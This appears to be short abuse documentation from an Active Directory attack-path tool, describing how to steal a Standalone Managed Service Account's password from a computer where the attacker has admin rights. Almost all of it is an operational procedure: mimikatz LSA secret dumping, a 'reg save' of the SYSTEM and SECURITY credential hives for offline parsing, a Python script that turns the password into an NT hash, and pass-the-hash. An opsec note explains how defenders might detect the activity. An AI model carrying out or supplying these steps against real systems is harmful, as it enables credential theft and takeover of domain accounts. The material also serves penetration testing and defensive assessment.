A computer with this indicates that a Standalone Managed Service Account (sMSA) is installed on it. An actor with administrative privileges on the computer can retrieve the sMSA’s password by dumping LSA secrets.
Abuse Info
From an elevated command prompt on the computer where the sMSA resides, run mimikatz then execute the following commands:
In the output, find _SC_{262E99C9-6160-4871-ACEC-4E61736B6F21}_ suffixed by the name of the targeted sMSA. The next line contains cur/hex : followed with the sMSA’s password hex-encoded.
To use this password, its NT hash must be calculated. This can be done using a small python script:
# nt.py
import sys, hashlib
pw_hex = sys.argv[1]
nt_hash = hashlib.new('md4', bytes.fromhex(pw_hex)).hexdigest()
Execute it like so:
python3 nt.py 35f3e1713d61...
To authenticate as the sMSA, leverage pass-the-hash.
Alternatively, to avoid executing mimikatz on the host, you can save a copy of the SYSTEM and SECURITY registry hives from an elevated prompt:
reg save HKLM\SYSTEM %temp%\SYSTEM & reg save HKLM\SECURITY %temp%\SECURITY
Transfer the files named SYSTEM and SECURITY that were saved at %temp% to another computer where mimikatz can be safely executed.
On this other computer, run mimikatz from a command prompt then execute the following command to obtain the hex-encoded password:
lsadump::secrets /system:C:\path\to\file\SYSTEM /security:C:\path\to\file\SECURITY
Opsec Considerations
Access to registry hives can be monitored and alerted via event ID 4656 (A handle to an object was requested).
- https://simondotsh.com/infosec/2022/12/12/assessing-smsa.html
- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
- https://github.com/gentilkiwi/mimikatz